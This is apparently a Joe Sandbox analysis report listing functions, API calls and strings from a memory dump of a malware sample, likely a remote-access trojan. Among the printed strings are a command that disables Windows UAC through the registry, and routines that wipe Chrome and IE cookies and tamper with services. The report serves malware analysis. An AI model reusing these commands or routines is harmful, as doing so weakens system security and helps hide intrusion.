Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
PathFileExistsA.SHLWAPI(?), ref: 0040AEB9

Strings

Cookies, xrefs: 0040AE3E
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040AE43
[IE cookies not found], xrefs: 0040AE81
[IE cookies cleared!], xrefs: 0040AF06, 0040AF2B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 13b02dafbbb2df2509005d2ea6d237cbb7e060283ac4043076e9ae9448562644
Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
Opcode Fuzzy Hash: 13b02dafbbb2df2509005d2ea6d237cbb7e060283ac4043076e9ae9448562644
Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA

Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3d8c9a568c57fb9dcdc880f5c8ebbc933660610661b36433ba77454d73a655
Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
Opcode Fuzzy Hash: 4e3d8c9a568c57fb9dcdc880f5c8ebbc933660610661b36433ba77454d73a655
Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269

Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
InternetCloseHandle.WININET(00000000), ref: 00419407
InternetCloseHandle.WININET(00000000), ref: 0041940A

Strings

http://geoplugin.net/json.gp, xrefs: 004193A2

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
Opcode Fuzzy Hash: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9

Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A

_free.LIBCMT ref: 0044E128

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044E133
_free.LIBCMT ref: 0044E13E
_free.LIBCMT ref: 0044E192
_free.LIBCMT ref: 0044E19D
_free.LIBCMT ref: 0044E1A8
_free.LIBCMT ref: 0044E1B3

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654

Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
Opcode Fuzzy Hash: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C

Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
GetLastError.KERNEL32 ref: 0040AA28

Strings

[Chrome Cookies not found], xrefs: 0040AA42
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
[Chrome Cookies found, cleared!], xrefs: 0040AA4E
UserProfile, xrefs: 0040A9EE

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
Opcode Fuzzy Hash: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F

Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00438A09
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
__allrem.LIBCMT ref: 00438A3C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
__allrem.LIBCMT ref: 00438A71
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D

Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00442E37
__cftoe.LIBCMT ref: 00442E69

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: eba01cb7e667bf10c13e1131eb8d53c0a733c53fb11b583ea7a9a5fabebc0a3a
Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
Opcode Fuzzy Hash: eba01cb7e667bf10c13e1131eb8d53c0a733c53fb11b583ea7a9a5fabebc0a3a
Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C

Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00444B89
__freea.LIBCMT ref: 00444C33
__freea.LIBCMT ref: 00444C51

Part of subcall function 00433BED: _free.LIBCMT ref: 00433C03

Strings

am/pm, xrefs: 00444CB4
a/p, xrefs: 00444D18

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm
API String ID: 2936374016-3206640213
Opcode ID: 57e5036cd7783279a466902622085f7a15e34eba906f96654b679836998df48b
Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
Opcode Fuzzy Hash: 57e5036cd7783279a466902622085f7a15e34eba906f96654b679836998df48b
Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59

Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
int.LIBCPMT ref: 0040F8D7

Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14

std::_Facet_Register.LIBCPMT ref: 0040F917
std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
__CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
__Init_thread_footer.LIBCMT ref: 0040F97F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID:
API String ID: 3815856325-0
Opcode ID: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
Opcode Fuzzy Hash: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9

Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: e5fb97a0e042aa3cf5d98ae642475e55fc2ba561f34e835e136d8c0823c8ccc0
Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
Opcode Fuzzy Hash: e5fb97a0e042aa3cf5d98ae642475e55fc2ba561f34e835e136d8c0823c8ccc0
Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9

Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
_free.LIBCMT ref: 0044575C
_free.LIBCMT ref: 00445784
SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
_abort.LIBCMT ref: 004457A3

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
Opcode Fuzzy Hash: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D

Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 3bbd86ba799800cf7f8ce060c277169374427670bb2790cc1e4148a280c4ce89
Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
Opcode Fuzzy Hash: 3bbd86ba799800cf7f8ce060c277169374427670bb2790cc1e4148a280c4ce89
Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9

Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 51d638f86096adaa624434d30e6a89006adfc0cfe1ec13e8d912c26abb46eda1
Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
Opcode Fuzzy Hash: 51d638f86096adaa624434d30e6a89006adfc0cfe1ec13e8d912c26abb46eda1
Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9

Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 0684a22c1c03eddcd9e7afcbe452ed3b601dba84a8ad96751855c8c9c88a9e76
Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
Opcode Fuzzy Hash: 0684a22c1c03eddcd9e7afcbe452ed3b601dba84a8ad96751855c8c9c88a9e76
Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9

Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041B310
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
GetLastError.KERNEL32 ref: 0041B335

Strings

0, xrefs: 0041B2E0
MsgWindowClass, xrefs: 0041B2DB

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4

Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043761A

Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C

_UnwindNestedFrames.LIBCMT ref: 00437631
___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
CallCatchBlock.LIBVCRUNTIME ref: 00437667

Strings

/zC, xrefs: 00437626, 00437617

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: /zC
API String ID: 2633735394-4132788633
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98

Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 004173AA
GetSystemMetrics.USER32(0000004D), ref: 004173B0
GetSystemMetrics.USER32(0000004E), ref: 004173B6
GetSystemMetrics.USER32(0000004F), ref: 004173BC

Strings

]tA, xrefs: 004173EB

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID: ]tA
API String ID: 4116985748-3517819141
Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94

Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040E542
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5

Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 0044085A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 00440890

Strings

CorExitProcess, xrefs: 00440865
mscoree.dll, xrefs: 00440853

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98

Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

Connection KeepAlive | Disabled, xrefs: 004050D9

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive | Disabled
API String ID: 2993684571-3818284553
Opcode ID: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
Opcode Fuzzy Hash: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A

Function 00418D76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
Sleep.KERNEL32(00002710), ref: 00418DBD
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6

Strings

Alarm triggered, xrefs: 00418D7F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
